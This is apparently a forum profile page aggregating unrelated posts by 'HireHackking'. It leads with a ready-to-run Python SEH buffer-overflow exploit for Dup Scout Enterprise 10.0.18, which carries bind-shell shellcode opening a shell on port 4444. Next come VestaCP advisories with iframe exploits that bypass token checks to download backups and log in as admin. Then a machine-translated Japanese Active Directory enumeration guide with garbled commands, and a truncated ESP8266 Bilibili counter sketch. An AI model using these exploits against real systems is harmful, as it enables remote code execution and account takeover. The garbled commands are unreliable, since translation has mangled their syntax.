Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH) # Date: 2020-12-08 # Exploit Author: Andrés Roldán # Vendor Homepage: http://www.dupscout.com # Software Link: http://www.dupscout.com/downloads.html # Version: 10.0.18 # Tested on: Windows 10 Pro x64 #!/usr/bin/env python3 import socket import struct HOST = '127.0.0.1' PORT = 80 # msfvenom --platform windows --arch x86 -p windows/shell_bind_tcp -b "\x00\0x9\x0a\x0d\x20" -f python -v SHELL SHELL = b"" SHELL += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e" SHELL += b"\x81\x76\x0e\xfa\xfa\xc4\x90\x83\xee\xfc\xe2\xf4" SHELL += b"\x06\x12\x46\x90\xfa\xfa\xa4\x19\x1f\xcb\x04\xf4" SHELL += b"\x71\xaa\xf4\x1b\xa8\xf6\x4f\xc2\xee\x71\xb6\xb8" SHELL += b"\xf5\x4d\x8e\xb6\xcb\x05\x68\xac\x9b\x86\xc6\xbc" SHELL += b"\xda\x3b\x0b\x9d\xfb\x3d\x26\x62\xa8\xad\x4f\xc2" SHELL += b"\xea\x71\x8e\xac\x71\xb6\xd5\xe8\x19\xb2\xc5\x41" SHELL += b"\xab\x71\x9d\xb0\xfb\x29\x4f\xd9\xe2\x19\xfe\xd9" SHELL += b"\x71\xce\x4f\x91\x2c\xcb\x3b\x3c\x3b\x35\xc9\x91" SHELL += b"\x3d\xc2\x24\xe5\x0c\xf9\xb9\x68\xc1\x87\xe0\xe5" SHELL += b"\x1e\xa2\x4f\xc8\xde\xfb\x17\xf6\x71\xf6\x8f\x1b" SHELL += b"\xa2\xe6\xc5\x43\x71\xfe\x4f\x91\x2a\x73\x80\xb4" SHELL += b"\xde\xa1\x9f\xf1\xa3\xa0\x95\x6f\x1a\xa5\x9b\xca" SHELL += b"\x71\xe8\x2f\x1d\xa7\x92\xf7\xa2\xfa\xfa\xac\xe7" SHELL += b"\x89\xc8\x9b\xc4\x92\xb6\xb3\xb6\xfd\x05\x11\x28" SHELL += b"\x6a\xfb\xc4\x90\xd3\x3e\x90\xc0\x92\xd3\x44\xfb" SHELL += b"\xfa\x05\x11\xfa\xf2\xa3\x94\x72\x07\xba\x94\xd0" SHELL += b"\xaa\x92\x2e\x9f\x25\x1a\x3b\x45\x6d\x92\xc6\x90" SHELL += b"\xeb\xa6\x4d\x76\x90\xea\x92\xc7\x92\x38\x1f\xa7" SHELL += b"\x9d\x05\x11\xc7\x92\x4d\x2d\xa8\x05\x05\x11\xc7" SHELL += b"\x92\x8e\x28\xab\x1b\x05\x11\xc7\x6d\x92\xb1\xfe" SHELL += b"\xb7\x9b\x3b\x45\x92\x99\xa9\xf4\xfa\x73\x27\xc7" SHELL += b"\xad\xad\xf5\x66\x90\xe8\x9d\xc6\x18\x07\xa2\x57" SHELL += b"\xbe\xde\xf8\x91\xfb\x77\x80\xb4\xea\x3c\xc4\xd4" SHELL += b"\xae\xaa\x92\xc6\xac\xbc\x92\xde\xac\xac\x97\xc6" SHELL += b"\x92\x83\x08\xaf\x7c\x05\x11\x19\x1a\xb4\x92\xd6" SHELL += b"\x05\xca\xac\x98\x7d\xe7\xa4\x6f\x2f\x41\x34\x25" SHELL += b"\x58\xac\xac\x36\x6f\x47\x59\x6f\x2f\xc6\xc2\xec" SHELL += b"\xf0\x7a\x3f\x70\x8f\xff\x7f\xd7\xe9\x88\xab\xfa" SHELL += b"\xfa\xa9\x3b\x45" PAYLOAD = ( b'\x90' * (2482 - len(SHELL)) + SHELL + b'\xeb\x10\x90\x90' + # 0x1002071c: add esp,8 # ret 0x04 at libspp.dll (ASLR: False, Rebase: False, SafeSEH: False) struct.pack('<L', 0x1002071c) + b'\x90' * 32 + b'\xE9\x4D\xF6\xFF\xFF' + b'C' * (10000 - 2482 - 4 - 32 - len(SHELL)) ) HTTP_PAYLOAD = ( b'GET /settings&sid=' + PAYLOAD + b' HTTP/1.1\r\n' + b'Host: ' + HOST.encode() + b'\r\n\r\n' ) with socket.create_connection((HOST, PORT)) as fd: print('[+] Sending payload...') fd.sendall(HTTP_PAYLOAD) print('[+] Done. Check for a shell on port 4444.')
  2. HireHackking

    VestaCP 0.9.8-26 - 'backup' Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: VestaCP 0.9.8-26 - 'backup' Information Disclosure # Date: 2020-11-25 # Exploit Author: Vulnerability-Lab # Vendor Homepage: https://vestacp.com/ # Software Link: https://vestacp.com/install/ # Version: 0.9.8-26 Document Title: =============== VestaCP v0.9.8-26 - Insufficient Session Validation Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2238 Release Date: ============= 2020-11-25 Vulnerability Laboratory ID (VL-ID): ==================================== 2238 Common Vulnerability Scoring System: ==================================== 7 Vulnerability Class: ==================== Insufficient Session Validation Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Web interface is open source php and javascript interface based on Vesta open API, it uses 381 vesta CLI calls. The GNU General Public Licence is a free, copyleft licence for software and other kinds of works. Its free to change, modify and redistribute source code. (Copy of the Homepage: https://vestacp.com/features/ & https://vestacp.com/install/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a insufficient session validation vulnerability in the VestaCP v0.9.8-26 hosting web-application. Affected Product(s): ==================== Vesta Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-04: Researcher Notification & Coordination (Security Researcher) 2020-05-05: Vendor Notification (Security Department) 2020-05-07: Vendor Response/Feedback (Security Department) 2020-**-**: Vendor Fix/Patch (Service Developer Team) 2020-**-**: Security Acknowledgements (Security Department) 2020-11-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Full Disclosure Technical Details & Description: ================================ An insufficient session validation vulnerability has been discovered in the official VestaCP (Control Panel) v0.9.8-26 hosting web-application. The vulnerability allows remote attackers to gain sensitive web-application data or information without permission, authentication or authorization. The backup url includes a token parameter for the download request on backups. The mechanism is to secure that other users can only download the backup with the token to confirm the permission. The token is not required for the download and can be deattached in the client-side session request. The session validation of the backup download request is insufficient validating the request without token parameter approval. Next to that the backup uses the name of the privileges in combination with the date in a tar compressed folder. Thus allows a remote attacker with low user privileges to download the backup data without permission. Successful exploitation of the session web vulnerability results in information disclosure of the local application and dbms backup files. Request Method(s): [+] GET Vulnerable Module(s): [+] /download/backup/ Vulnerable Parameter(s): [+] token Affected Parameter(s): [+] backup Proof of Concept (PoC): ======================= The insufficient session validation vulnerability can be exploited by remote attackers with simple user privileges without user interaction. For security demonstration or to reproduce the information disclosure issue follow the provided information and steps below to continue. Request: Default (Download Backup) https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4 https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4 PoC: Exploitation https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar PoC: Exploit <html> <head><body> <title>VestaCP (Control Panel) v0.9.8-26 - Information Disclosure (Backup)</title> <iframe src=https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar> </body></head> <html> --- PoC Session Logs [GET] --- https://vestacp.localhost:8083/download/backup/?backup=user.2020-**-**_00-00-17.tar Host: vestacp.localhost:8083 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: PHPSESSID=4neq25hga91vqrf4maktd4q073; - GET: HTTP/1.1 200 OK Server: nginx Content-Type: application/gzip Content-Length: 3891200 Connection: keep-alive Content-Disposition: attachment; filename="user.2020-**-**_00-00-17.tar"; Accept-Ranges: bytes Reference(s): https://vestacp.localhost:8083/ https://vestacp.localhost:8083/download/ https://vestacp.localhost:8083/download/backup/ https://vestacp.localhost:8083/download/backup/?backup Security Risk: ============== The security risk of the session validation web vulnerability in the vestacp web-application is estimated as high. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
  3. HireHackking

    VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation # Date: 2020-11-26 # Exploit Author: Vulnerability-Lab # Vendor Homepage: https://vestacp.com/ # Software Link: https://vestacp.com/install/ # Version: 0.9.8-26 Document Title: =============== VestaCP v0.9.8-26 - (LoginAs) Token Session Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2240 Release Date: ============= 2020-11-26 Vulnerability Laboratory ID (VL-ID): ==================================== 2240 Common Vulnerability Scoring System: ==================================== 8.3 Vulnerability Class: ==================== Insufficient Session Validation Current Estimated Price: ======================== 2.000€ - 3.000€ Product & Service Introduction: =============================== Web interface is open source php and javascript interface based on Vesta open API, it uses 381 vesta CLI calls. The GNU General Public Licence is a free, copyleft licence for software and other kinds of works. Its free to change, modify and redistribute source code. (Copy of the Homepage: https://vestacp.com/features/ & https://vestacp.com/install/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a insufficient session validation vulnerability in the VestaCP v0.9.8-26 hosting web-application. Affected Product(s): ==================== Vesta Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-04: Researcher Notification & Coordination (Security Researcher) 2020-05-05: Vendor Notification (Security Department) 2020-05-07: Vendor Response/Feedback (Security Department) 2020-**-**: Vendor Fix/Patch (Service Developer Team) 2020-**-**: Security Acknowledgements (Security Department) 2020-11-26: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= No User Interaction Disclosure Type: ================ Full Disclosure Technical Details & Description: ================================ A session token vulnerability has been discovered in the official VestaCP (Control Panel) v0.9.8-26 hosting web-application. The vulnerability allows remote attackers to gain unauthenticated or unauthorized access by client-side token manipulation. The token vulnerability is located in the function of the `LoginAs` module. Remote attackers are able to perform LoginAs requests without session token to preview there profiles. The attack requires user account privileges for manipulation of the request. The admin panel allows to request via token the local user accounts to login as via account switch. In that moment the token of the request can be removed to perform the same interaction with user privileges. Thus allows to access other account information without administrative permissions. The permission approval on login request is insufficient regarding a misconfiguration on the token implementation (client-side). Successful exploitation of the web vulnerability results in information disclosure, user or admin account compromise and elevation of privileges by further exploitation. Request Method(s): [+] GET Vulnerable Module(s): [+] /login/ Vulnerable Parameter(s): [+] token Affected Parameter(s): [+] loginas Proof of Concept (PoC): ======================= The token web vulnerability can be exploited by remote attackers with simple user privileges without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Request: Default (Download Backup) https://vestacp.localhost:8083/login/?loginas=user&token=f230a989082eec102ad5a3bb81fd0190 https://vestacp.localhost:8083/login/?loginas=admin&token=f230a989082eec102ad5a3bb81fd0190 PoC: Exploitation https://vestacp.localhost:8083/login/?loginas=user/.admin&token=null PoC: Exploit <html> <head><body> <title>VestaCP (Control Panel) v0.9.8-26 - LoginAs User/Admin PoC</title> <iframe src="https://vestacp.localhost:8083/login/?loginas=admin&token=null"%20> </body></head> <html> --- PoC Session Logs [GET] --- https://vestacp.localhost:8083/login/?loginas=[ACCOUNTNAME]&token=null Host: vestacp.localhost:8083 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: https://vestacp.localhost:8083/list/user/ Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6; __utmc=80953744; __utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2; PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0; __utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1; metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1 - GET: HTTP/1.1 302 Moved Temporarily Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: / - https://vestacp.localhost:8083/ Host: vestacp.localhost:8083 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: https://vestacp.localhost:8083/list/user/ Connection: keep-alive Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6; __utmc=80953744; __utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2; PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0; __utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1; metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1 - GET: HTTP/1.1 302 Moved Temporarily Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 - Location: /list/user/ https://vestacp.localhost:8083/list/user/ Host: vestacp.localhost:8083 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: https://vestacp.localhost:8083/list/user/ Connection: keep-alive Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6; __utmc=80953744; __utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2; PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0; __utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1; metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1 - GET: HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Content-Encoding: gzip - Welcome - Logged in as user admin Reference(s): https://vestacp.localhost:8083/ https://vestacp.localhost:8083/login/ https://vestacp.localhost:8083/login/?loginas https://vestacp.localhost:8083/list/user/ Security Risk: ============== The security risk of the remote session vulnerability in the vestacp application is estimated as high. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
  4. HireHackking

    タイトル:Active Directory PowerShellモジュールが広告情報を収集します

    HireHackking posted a blog entry in Hacker Technology
    0x00はじめに Microsoftは、Windows Server 2008 R2(およびその後)に複数のActive Directory PowerShell CMDLetsを提供します。 Windowsクライアントでは、リモートサーバー管理ツール(RSAT)をインストールし、Active Directory PowerShellモジュールがインストールされていることを確認する必要があります。 Windows Server(2008 R2以降)で、PowerShellコンソールで次のコマンドを実行します(管理者として):Import-Module ServerManager。 add-windowsfeature rsat-ad-powershell。 0x01広告ディレクトリプレビュー AD PowerShell CMDLETSは、次の方法と同じ効果があります。 インポートモジュールアクティブディレクトリ $ userid="joeuser" get-aduser $ userid –property * PowerShell V3バージョンとより高いバージョンでは、PowerShellが必要なモジュールを認識して自動的にロードするため、コマンドの最初の行を実行する必要はないことに注意してください。 Active Directory PowerShellモジュールがロードされたら、ファイルシステムを閲覧するのと同じように広告を閲覧できます。コマンドは次のとおりです。 PS Import-Module ActiveDirectory PSDIR AD: PSSET-Location AD: PSセットロケーション "dc=lab、dc=adsecurity、dc=org" psdir 0x02便利なコマンド(cmdlets)を見つけます 1。利用可能なPowerShellモジュールの基本的なモジュールと統計的発見:Get-Module -Listavailable PowerShellモジュールでCMDLETを発見:Get -Command -Module ActiveDirectory PowerShell ADモジュールのcmdletsの数: (Get -Command -Module ActiveDirectory).Count Windows Server 2008 R2: 76 CMDLETS Windows Server 2012: 135 cmdlets Windows Server 2012 R2: 147 CMDLETS Windows Server 20163360147 CMDLETS Windows Server 2008 R2メインCMDLETS: •get/set-adforest •get/set-addomain •get/set-addomaincontroller •get/set-aduser •get/set-adcomputer •get/set-adgroup •get/set-adgroupMember •get/set-adobject •Get/Set-AdorganizationalUnit •enable-adoptionalfeature •無効化/有効化- アダクカウント •move-addirectoryserveroperationmasterrole •新しい虐待者 •new-adcomputer •new-Adggroup •new-adobject •new-adorganizationalUnit Windows Server 2012には、いくつかの新しいcmdlets:が含まれています • *-ADRESOURCEPROPERTYLISTMEMBER • *-adeuthenticationPolicy • *-adeuthenticationPolicysilo • *-adcentralaccesspolicy • *-adcentralAccessrule • *-AdresourceProperty • *-ADRESOURCEPROPERTYLIST • *-ADRESOURCEPROPERTYVALUEETYPE • *-ADDCCLONECONFIGFILE • *-adreplicationAttributeMetadata • *-ADREPLICATIONCONNECTION • *-ADREPLICATIONFAILURE • *-ADREPLICATIONPARTNERMETADATA • *-ADREPLICITIONQUEUOOPERATION • *-ADREPLICESSITE • *-ADREPLICATIONSITELINK • *-ADREPLICATIONSITELINKBRIDGE • *-ADREPLICATIONSUBNET • *-ADREPLICATIONUPTODATENESSEVECTORTABLE •sync-adobject 2。グローバルディレクトリを発見するグローバルカタログ(GCS)•Forest GCS(Forest Global Directory): インポートモジュールアクティブディレクトリ $ adforest=get-adforest $ adforestglobalcatalogs=$ adforest.globalcatalogs •GCSであるドメインDC(ドメインDCのグローバルディレクトリとして): インポートモジュールアクティブディレクトリ $ dcsnotgcs=get -addomaincontroller -filter {isglobalcatalog -eq $ true} •GCSではないドメインDC(非ドメインDCのグローバルディレクトリとして): インポートモジュールアクティブディレクトリ $ dcsnotgcs=get -addomaincontroller -filter {isglobalcatalog -eq $ false}} 3. Active Directory Flexible Single Host操作(FSMO)役割Active Directoryモジュールを見つけます。 (get-adforest).schemamaster (get-adforest).domainnamingmaster (get-addomain).infrastructuremaster (get-addomain).pdcemulator (get-addomain).ridmaster .NETコール: •現在のドメイン:を取得します [System.DirectoryServices.activedirectory.domain] :GetCurrentDomain()。名前 [System.DirectoryServices.activedirectory.domain] :GetComputerDomain()。名前 •コンピューターのsite: [system.directoryservices.activedirectory.activedirectorysite] :getComputerSite()を取得します •すべてのドメインコントローラーをドメイン: [System.DirectoryServices.Activedirectory.domain] :GetCurrentDomain()。ドメインコントロラーにリストします •Active Directory Domain Mode: [System.DirectoryServices.Activedirectory.Domain] :GetCurrentDomain()。ドメインモードを取得します •Active Directory FSMOS:([system.directoryservices.activedirectory.forest] :getCurrentforest()) ([system.directoryservices.activedirectory.forest] :getCurrentforest()) ([system.directoryservices.activedirectory.domain] :getCurrentDomain()) ([system.directoryservices.activedirectory.domain] :getCurrentDomain()) ([system.directoryservices.activedirectory.domain] :getCurrentDomain()) •Active Directory Forest Name:を取得します [System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。名前 •アクティブのサイトのリストを取得します ディレクトリフォレスト: [配列] $ adsites= [System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。サイト •Active Directory Forest Domains:を取得します [System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。ドメイン •Active Directory Forest Globalを取得します カタログ: [System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。GlobalCatalogs •Active Directory Forest Mode:を取得します [System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。ForestMode •アクティブディレクトリフォレストルートを取得します domain3360 [System.DirectoryServices.Activedirectory.Forest] :GetCurrentForest()。rootdomain 4。FSMOの役割は、あるDCから別のDCGet-Commandに移動します -module Activedirectory -Noun *Master * •移動FSMOロール: move-addirectoryserveroperationmasterrole -identity $ dcname -operationmasterrole ridmaster move-addirectoryserveroperationmasterrole - アイデンティティ$ dcname- OperationMasterrole DomainNamingMaster move-addirectoryserveroperationmasterrole -identity $ dcname -operationmasterrole pdcemulato •FSMOロールの押収: move-addirectoryserveroperationmasterrole -identity $ dcname -operationmasterrole pdcemulator -force 0x03 Active Directory PowerShell Module Cmdletの例 1.Get-Rootdse LDAPサーバー(ドメインコントローラー)に関する情報を取得し、その内容を表示します。結果には、DCが実行するオペレーティングシステム情報など、いくつかの興味深い情報が含まれています。 2.Get-Adforestは、このコマンドを実行しているコンピューターでアクティブに提供します ディレクトリフォレスト情報。 3。Get-Addomainは、現在のドメインに関する情報を提供します 4.Get-AddomainControllerは、ドメインコントローラーに固有のコンピューター情報を提供します。 CMDLETコマンドを介して、特定のサイトですべてのDCSまたはONSバージョン情報を簡単に見つけることができます。 5.Get-AdComputerは、ADのほとんどのコンピューターオブジェクトに関する情報を提供します。 「-Prop *」パラメーターで実行されるコマンドは、すべての標準属性情報を表示できます。 6。広告コンピューターの統計$ time=(測定コマンド ` {[array] $ allcomputers= get -adcomputer -filter * -properties 名前、canonicalName、enabled、passwordlastset、samaccountname、lastlogontimest AMP、DistinguishedName、OperatingSystem })。トータルミニュート $ allcomputerscount= $ allcomputers.count 書き込み出力「ありました $ allcomputerscountコンピューターで発見されました $ domaindns in $ time分… `r" 7.Get-Aduserは、広告ユーザーに関するコンテンツのほとんどに関する情報を提供します。 「-Prop *」パラメーターを使用してコマンド実行は、すべての標準属性情報を表示できます。 8。広告ユーザー統計インポートモジュールActive Directory $ domaindns= [System.DirectoryServices.activedirectory.domain] :GetCurrentDomain()。名前 [array] $ allusers=get-aduser -filter * -properties 名前、distinguedname、enabled、lastlogondate、lastlogontimestamp、lockedout、msexchhom eservername、samaccountname $ alluserscount=$ allusers.count 書き込み出力「ありました $ aldomaindnsrootで発見されたユーザーオブジェクト… " [array] $ disabledusers= $ Allusers | where -object {$ _。enabled -eq $ false} $ DisabledUserScount= $ disabledusers.count [array] $ enabledusers=$ allusers | where -object {$ _。enabled -eq $ true} $ enableduserscount= $ enabledusers.count 書き込み出力「あります $ enableduserscountはユーザーを有効にし、$ disableduserscountがあります $ domaindnsの無効なユーザー」 9.Get-Adgroupは広告グループに関する情報を提供し、次のコマンドを実行してすべてのセキュリティグループを見つけます。 get -adgroup -filter {groupCategory -EQ 'セキュリティ} 10.Get-AdgroupMemberの列挙およびグループメンバー情報を返します。 「-Recursive」パラメーターを使用して、ネストされたグループのすべてのメンバーを含めます。 Get -AdgroupMember「管理者」 - 再編成 11.非アクティブコンピューターを見つける次の例は、非アクティブな(古いバージョン)コンピューターとユーザーを探します。過去10日間にパスワードが変更されていないアカウント。これはテストの例であることに注意してください。実際の生産環境については、この推奨事項を60〜90日間のコンピューターと、ユーザー向けの180〜365日間の戦略に変更します。 12.非アクティブユーザーを見つける 13。ドメイントラストを列挙します 14。アクティビティディレクトリの実装日を取得 15.広告パスワードポリシーを取得する 16。広告サイト情報を取得するには、Windows 2012モジュールにサイトのcmdlet(get-adreplicationsite*)が含まれていることに注意してください。 17。TOMBSTONELIFETIME情報を取得する 18.ADのリサイクル情報には、森林機能モード=が必要です Windows Server 2008 R2 •リサイクルビンを有効にします (エンタープライズ管理者として) enable-adoptionalfeature –Indidity 'CN=リサイクルビン機能、CN=オプション機能、CN=ディレクトリ サービス、CN=Windows nt、cn=services、cn=configuration、dc=domain、dc=com ’–Scope ForestorConfigurationset - ターゲット 「domain.com」 •すべての削除されたユーザーを見つけます $ deletedusers=get-adobject -searchbase "cn=削除されたオブジェクト、dc=domain、dc=com" -filter {objectc
  5. HireHackking

    Title: Esp8266 Get fans on B station Likes Number of articles

    HireHackking posted a blog entry in Hacker Technology
    In this article, we will introduce to you the information related to the use of ESP8266 and OLED screen to display B station through pictures, text and videos. Effect Preparation esp82660.96-inch OLED screen DuPont line several B stations id Experimental Environment esp8266 version 2.7.1U8g2_ArduinoTimeArduinoJsonArduinoHttpClient If the installation fails due to network reasons when installing these libraries, you can directly download the offline library and place it in the libraries directory under the IDE. Code /*************************************************************************** ESP8266 with 0.96inch OLED pin VCC --- VCC GND --- GND SDA --- SDA(D1) SCL --- SCL(D2) ****************************************************************** #if defined(ESP32) //ESP32 #include WiFi.h #include HTTPClient.h #include WebServer.h #include ESPmDNS.h #elif defined(ESP8266) //ESP8266 #include ESP8266WiFi.h #include ESP8266HTTPClient.h #include ESP8266WebServer.h #include ESP8266mDNS.h #else #error 'Please check your mode setting,it must be esp8266 or esp32.' #endif #include ArduinoJson.h #include U8g2lib.h #include Wire.h #include Ticker.h //Timer Ticker timer; int count=0; boolean flag=true; //JSON DynamicJsonBuffer jsonBuffer(256); //ArduinoJson V5 //Display screen If the pins are different, you need to modify it here //U8G2_SSD1306_128X64_NONAME_F_HW_I2C u8g2(U8G2_R0, /* reset=*/U8X8_PIN_NONE, /* clock=*/D2, /* data=*/D1); U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //Here D1 D2 is the corresponding welding pin //WiFi name and password const char *ssid='PDCN'; //Fill in your wifi name here const char *password='1234567890';//Fill in your wifi password here //Dot map of 24*24 small TV const unsigned char bilibilitv_24u[] U8X8_PROGMEM={0x00,0x00,0x02,0x00,0x00,0x03,0x30,0x00,0x01,0xe0,0x80,0x01, 0x80,0xc3,0x00,0x00,0xef,0x00,0xff,0xff,0xff,0x03,0x00,0xc0,0xf9,0xff,0xdf,0x09,0x00,0xd0,0x09,0x00,0xd0,0x89,0xc1, 0xd1,0xe9,0x81,0xd3,0x69,0x00,0xd6,0x09,0x91,0xd0,0x09,0xdb,0xd0,0x09,0x7e,0xd0,0x0d,0x00,0xd0,0x4d,0x89,0xdb,0xfb, 0xff,0xdf,0x03,0x00,0xc0,0xff,0xff,0xff,0x78,0x00,0x1e,0x30,0x00,0x0c }; //B station API URL : follow, view, likes String NAME='Xiaoyaozi'; //Change it into your own name String UID='430579369'; //Change it to your own UID String followUrl='http://api.bilibili.com/x/relation/stat?vmid=' + UID; //Number of fans String viewAndLikesUrl='http://api.bilibili.com/x/web-interface/card?mid=' + UID; //Number of plays and likes long follower=0; //Number of 